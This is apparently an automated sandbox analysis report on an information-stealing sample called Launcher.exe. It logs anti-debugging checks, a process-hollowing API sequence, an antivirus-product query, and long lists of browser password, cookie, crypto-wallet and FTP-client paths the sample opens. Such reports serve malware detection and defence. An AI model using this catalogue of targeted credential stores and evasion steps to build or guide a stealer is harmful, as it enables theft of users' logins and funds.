              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0023DD90 mov eax, dword ptr fs:[00000030h]0_2_0023DD90
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_00239EF0 mov edi, dword ptr fs:[00000030h]0_2_00239EF0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0023C785 mov eax, dword ptr fs:[00000030h]0_2_0023C785
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0023DD83 mov eax, dword ptr fs:[00000030h]3_2_0023DD83
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0023DD90 mov eax, dword ptr fs:[00000030h]3_2_0023DD90
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00239EF0 mov edi, dword ptr fs:[00000030h]3_2_00239EF0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0024EFB0 GetProcessHeap,0_2_0024EFB0
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0024A464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0024A464
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0024A458 SetUnhandledExceptionFilter,0_2_0024A458
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0024CDEA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0024CDEA
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_00249AF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00249AF9
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_00249AF9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00249AF9
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0024A464 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0024A464
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0024A458 SetUnhandledExceptionFilter,3_2_0024A458
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 3_2_0024CDEA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0024CDEA

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0026018D GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0026018D
              Source: C:\Users\user\Desktop\Launcher.exeMemory written: C:\Users\user\Desktop\Launcher.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeProcess created: C:\Users\user\Desktop\Launcher.exe "C:\Users\user\Desktop\Launcher.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0024A220 cpuid 0_2_0024A220
              Source: C:\Users\user\Desktop\Launcher.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeCode function: 0_2_0024A8E5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0024A8E5
              Source: C:\Users\user\Desktop\Launcher.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 5688, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Launcher.exe, 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: Launcher.exe, 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Launcher.exe, 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
              Source: Launcher.exe, 00000003.00000003.2256165464.00000000034AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: Launcher.exe, 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Launcher.exe, 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: Launcher.exe, 00000003.00000003.2256165464.00000000034AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: Launcher.exe, 00000003.00000003.2216504961.000000000351C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: Launcher.exe, 00000003.00000003.2216522144.0000000003503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\QNCYCDFIJJJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: C:\Users\user\Desktop\Launcher.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
              Source: Yara matchFile source: 00000003.00000003.2215064071.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2215064071.0000000003503000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Launcher.exe PID: 5688, type: MEMORYSTR

